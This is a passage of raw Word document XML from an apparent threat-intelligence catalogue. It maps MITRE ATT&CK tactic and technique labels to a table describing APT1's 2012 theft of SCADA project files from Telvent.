          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Email Collection&gt;:Remote Email Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC6E7C8"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r w:rsidRPr="00DE1C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE1C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1119 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE1C01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6AF08"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765BBC6" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="0038284F" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0038284F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0038284F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E143C4" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="0025199D" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1114.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Email Collection&gt;:Local Email Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F18FD2"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E27280E" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="0025199D"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00202237" w14:textId="7F3886D6" w:rsidR="002252F8" w:rsidRPr="00A16DF2" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19906309" w14:textId="101D55BB" w:rsidR="002252F8" w:rsidRDefault="004835AB" w:rsidP="004835AB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc153480845"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001, T1566.002 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A144C">
        <w:t>APT1: Exposing One of China's Cyber Espionage Units</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="0C8F12ED" w14:textId="3EAA7D01" w:rsidR="002252F8" w:rsidRDefault="002252F8" w:rsidP="002252F8">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845FF8" w:rsidRPr="002D1D50" w14:paraId="50A9FBDC" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED53F29" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="002D1D50" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E4E853" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="002D1D50" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B1AF97" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="00387DCC" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="7C63E132" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2430161E" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63CD45A7" w14:textId="7980B944" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54F5FFD1" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="00387DCC" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="4F0FED7C" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC32710" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="007328DE" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FBE59DE" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="007328DE" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">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048A7750" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="00387DCC" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="66ADFFF4" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31169B72" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B561F62" w14:textId="62ED5A5C" w:rsidR="00845FF8" w:rsidRPr="007328DE" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41FECA91" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRPr="00387DCC" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="2833ACF5" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C412755" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A8EACBD" w14:textId="2AAA0A34" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E85A5BA" w14:textId="585637E5" w:rsidR="00845FF8" w:rsidRPr="00387DCC" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="770F47F7" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617F0B6B" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E5EE99" w14:textId="4FAA75AA" w:rsidR="00845FF8" w:rsidRDefault="00DD09B0" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SCADA software engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CFF3E8B" w14:textId="4814ECEC" w:rsidR="00845FF8" w:rsidRPr="00387DCC" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] p23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="41FB0A1C" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2048B708" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15588668" w14:textId="0AA50368" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00DD09B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exfiltration (confidentiality) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435AF10E" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00384FBC" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Data Theft [1] p25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00290D97" w14:textId="5C2D86E2" w:rsidR="00997A18" w:rsidRDefault="00997A18" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00997A18">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Telvent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00997A18">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> said the attacker(s) installed malicious software and </w:t>
            </w:r>
            <w:r w:rsidRPr="00997A18">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">stole project files related to one of its core offerings — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00997A18">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>OASyS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00997A18">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> SCADA — a product that helps energy firms mesh older IT assets with more advanced “smart grid” technologies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="6592A23B" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56BFAD1D" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12610AB4" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE454B6" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="65B0633A" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4566A2A6" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D7AA5C1" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3535A2B9" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="15E0800E" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46419040" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C47B819" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="466E708C"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6EF080F4" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="609D60B7" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10943F33" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22493E87" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="046EF429" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADBA7F9" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C7D79F" w14:textId="11B5972E" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
